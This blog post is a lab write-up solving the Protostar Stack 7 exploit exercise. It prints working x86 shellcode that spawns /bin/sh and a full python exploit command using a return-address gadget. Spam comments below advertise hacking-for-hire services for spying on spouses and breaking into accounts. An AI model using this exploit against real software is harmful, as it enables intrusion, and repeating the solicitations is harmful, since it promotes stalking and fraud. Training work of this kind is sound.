Exploit Exercises - Protostar Stack 7

By Kendy Hikaru -
In this level, app check return address not start with 0xbxxxxxxx. So i pop pop ret to load return address to stack, and call it.
Found pop pop ret at: 0x08048492
This payload:
| "A" * 80 | address | 8 bytes junk | | NOP to bit shifing | Shell code |
This is shell code:
\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

Load poc to gdb, debug, break point, etc... I found nop shell start at: 0xbffff698. Ok build poc:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat)
And run it:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) | /opt/protostar/bin/stack7

----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

Comments

Alex said…
i strongly recommend BESTAPPSHACKERS@GMAIL.COM, last year he helped me spy on my wife when he was cheating of me, he served as a personal investigator to me by helping me spy on my wife's phone activities like facebook, email, whatsapp, calls, skype and others. am sure someone out there is looking for how to solve his relationship problems, contact him BESTAPPSHACKERS@GMAIL.COM or text him on whatsapp +1(602)-609-4730
July 14, 2020 at 11:42 PM
johnny said…
Do you need to hack into any, databaseserver spy on Facebook,Emails, Whatsapp, Viber, Snapchat, Instagram and many more.
I urge you to get in touch with the best people for the job, i have confirm the service when i need to spy on my spouse phone. They are good at Phone Cloning and Bitcoin/binary minning and any other hack job.
Thanks guys for the team work HACKINTECHNOLOGYATGMAILDOTCOM
+12132951376(WHATSAPP)
July 28, 2020 at 7:00 PM
ddd said…
Have you ever needed an expert when it comes to hacking? Have you ever wanted to hack someone’s email account? Recover lost accounts,school grade,boost credit score? Do you need to find a person’s sensitive information? Do you want to invade a person’s PayPal, Skrill, Amazon, Facebook or any other site account? Upgrade of University Grades,Password and email Retrieval, phone Lines monitoring, Skype Accounts, Hack Social Network, Trace calls on real time conversations, Remove Criminal Records, Credit Fixing, cyber-crime investigation, Hack Bank Accounts, Identification of Cheating Partner or employee,GET HOT STOCK TIPS Then contact contact Email:- stocktipsandethicalhacking2020@gmail.com Hangout :- stocktipsandethicalhacking2020@gmail.com Telegram Number +14242742967 Business Whatsapp :- ‪ 1 (925) 291-0054‬) Text Message/Call: ‪ +1 424) 274 2967‬‬ or click on this link to chat on whatsapp https://wa.me/message/REE2BBXU4CEYF1
September 8, 2020 at 12:08 AM
Post a Comment

Popular posts from this blog

Python - Multithread to read one file

By Kendy Hikaru -
Today, i am working with python. I need write script to read one file, and get line by line, per line deliver one thread process ( total 10 threads). I want solution, so i chose working with thread and queue.
In python, when procsess initializate, this process will be assigned with queue, and working with this queue. We will put data ( in this case is line) to queue. Process will read from queue, so, all processes can read one file, not overlap :D

import threading
import Queue

#Number of threads
n_thread = 5
#Create queue
queue = Queue.Queue()

class ThreadClass(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
    #Assign thread working with queue
        self.queue = queue

    def run(self):
        while True:
        #Get from queue job
            host = self.queue.get()
            print self.getName() + ":" + host
        #signals to queue job is done
            self.queue.task_done()

#Create number process
for i in range(n_thre…
Read more

Install Xposed Inspector and Frida on Genymotion

By Kendy Hikaru -
Image
Today i had some work with android. So i need trace application. I found 2 nice tool can help me:
Xposed Inspector and Frida. To setup there, i used Genymontion with x86 Emulator (quick start and light).
First create custom phone with Android 6.
1. Install Xposed Inspector
Inspeckage Inspector is one module of Xposed, so i need install Xposed before. Your phone need to be rooted (Default genymotion phone is rooted). You need download:
- Genymotion-ARM-Translation_v1.1.zip
- xposed-v80-sdk23-x86.zip (Exactly version with android api)
- XposedInstaller_3.0_alpha4
- Inspeckage Download at: https://acpm.mobi/genymotion-xposed-inspeckage.
Drag and drop Genymotion-ARM-Translation_v1.1.zip and xposed-v80-sdk23-x86.zip to phone, it will be flashed. Reboot.
After reboot, drag and drop XposedInstaller_3.0_alpha4 and Inspeckage to install apk.
Enable Inspeckage module and reboot (with xposed reboot function).
After reboot, start Inspeckage to monitor your app.
Port map: adb forward tcp:8008 tcp:…
Read more

OpenCA tutorial

By Kendy Hikaru -
Image
Install OpenCA tutorial

#yum install -y openssl-devel db4 db4-devel mysql-server mysql-devel perl-XML-Parser httpd
# rpm -Uvh openca-tools-1.3.0-1.el5.i386.rpm
# tar xvf openca-base-1.1.1.tar.gz
# cd openca-base-1.1.1
# mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.77 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.


mysql> create database openca;
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON *.* TO 'openca'@'localhost' IDENTIFIED BY '123456';
Query OK, 0 rows affected (0.00 sec)

# mysql -u openca -p

./configure --prefix=/opt/openca \
                 --with-ca-organization="HBN CA Labs" \
                 --with-httpd-fs-prefix=/var/www \
                 --with-httpd-main-dir=pki \
                 --with-db-name=openca \
                 --with-db-host=localhost \
         …
Read more